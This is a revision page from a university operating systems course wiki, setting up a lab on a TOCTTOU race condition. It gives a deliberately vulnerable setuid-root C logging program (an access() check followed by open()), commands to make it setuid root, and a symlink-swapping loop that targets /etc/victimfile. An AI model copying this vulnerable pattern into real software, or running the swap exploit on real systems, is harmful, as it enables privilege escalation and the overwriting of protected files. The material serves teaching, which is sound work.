Operating Systems 2019W: Tutorial 9: Difference between revisions

From Soma-notes
No edit summary
Line 7: Line 7:
===Running 3000log-write===
===Running 3000log-write===


First, compile [https://homeostasis.scs.carleton.ca/~soma/os-2019w/code/3000log-write.c 3000log-write.c]:
  gcc -O2 3000log-write.c -o 3000log-write
If you try running it, you'll find that it won't do much because it isn't running as root.
To make the binary setuid root, do the following:
  sudo su -  (to become root)
  chown root:root 3000log-write
  chmod u+s 3000log-write
  exit (so you're no longer root)
Create a file that will be overwritten:
  echo "This file will be overwritten" > testfile
Now, try running the following as a regular user:
  ./3000log-write testfile "Kilroy was here!!!"
What shows up in <tt>testfile</tt>?  Anything surprising about what is in the file now?
Also, where was the record of this event recorded?


===Setting up the exploit environment===
===Setting up the exploit environment===

Revision as of 02:23, 1 April 2019

This tutorial is not yet finalized.

In this tutorial you'll attempt to exploit a simple TOCTTOU vulnerability in 3000log-write.c using 3000fast-swap.c and some bash shell commands.

Tasks

Running 3000log-write

First, compile 3000log-write.c:

 gcc -O2 3000log-write.c -o 3000log-write

If you try running it, you'll find that it won't do much because it isn't running as root.

To make the binary setuid root, do the following:

 sudo su -  (to become root)
 chown root:root 3000log-write
 chmod u+s 3000log-write
 exit (so you're no longer root)

Create a file that will be overwritten:

 echo "This file will be overwritten" > testfile

Now, try running the following as a regular user:

 ./3000log-write testfile "Kilroy was here!!!"

What shows up in testfile? Anything surprising about what is in the file now?

Also, where was the record of this event recorded?

Setting up the exploit environment

Running the exploit

Code

3000run-write.c

/* 3000log-write.c

   A program to demonstrate TOCTTOU issues

   Usage: 3000log-write <file> <message>

   When run, writes message to the file.  It then also records a
   record of this action to /var/log/comp3000-write.log

   Note the program must be setuid root in order to add entries to
   the log file (which is owned by root).  But, it should only add entries
   to files that the current user can write to.
*/

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define LOGFILE "/var/log/3000write.log"

void usage(char *message)
{
        fprintf(stderr, "ERROR: %s\n", message);
        fprintf(stderr, "Usage:  log-append <file> <message>\n");
        exit(-1);
}

void test_root_privileges(void)
{
        if (geteuid() != 0) {
                fprintf(stderr, "Not running with root privileges, exiting.\n");
                exit(-1);
        }
}

char *get_username(void)
{
        char *username;
        char *default_username = "UNKNOWN";

        username = getenv("USER");

        if (username == NULL) {
                username = default_username;
        }

        return username;
}

void log_append(char *username, char *filename)
{
        FILE *f;
        
        f = fopen(LOGFILE, "a");
        if (!f) {
                fprintf(stderr, "Could not open log for writing.\n");
                exit(-1);
        }
        
        fprintf(f, "%s (%d) appended to %s\n", username, getuid(), filename);
        fclose(f);
}

void safe_write(char *filename, char *message)
{
        int fd;
        int allowed;

        if (access(filename, W_OK)) {
                fprintf(stderr, "You aren't allowed to write to %s\n",
                        filename);
                exit(-1);
        }
        
        fd = open(filename, O_WRONLY);
        if (fd == -1) {
                fprintf(stderr, "Could not open %s for writing.\n", filename);
                exit(-1);
        }
        
        write(fd, message, strlen(message));
        close(fd);
}


int main(int argc, char *argv[])
{
        char *username, *filename, *message;

        test_root_privileges();

        if (argc < 3) {
                usage("Not enough arguments");
        }

        filename = argv[1];
        message = argv[2];
        
        username = get_username();
        
        safe_write(filename, message);
        log_append(username, filename);
        
        printf("Message written to %s\n", filename);
        
        return 0;
}

3000fast-swap.c

/* 3000fast-swap.c
   
   Quickly swap files that are being used by 3000run-write.c.
   This is part of how to exploit TOCTTOU (race condition) 
   vulnerability in 3000run-write.c

   Note it assumes that:
     /etc/victimfile is a file that is only writable by root
     /home/student/tmp exists (and is owned by student)
     /home/student/tmp/safefile exists (and is owned by student)

   Change hard coded files and sleep times to change conditions of
   the swapping.
*/

#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>

int main(int argc, char *argv[])
{
        printf("Swapping between safefile and victimfile...\n");

        while(1) {
                unlink("/home/student/tmp/targetfile");
                symlink("/etc/victimfile",
                     "/home/student/tmp/targetfile");
                usleep(200);
                unlink("/home/student/tmp/targetfile");
                symlink("/home/student/tmp/safefile",
                     "/home/student/tmp/targetfile");
                usleep(200);
        }
        return 0;
}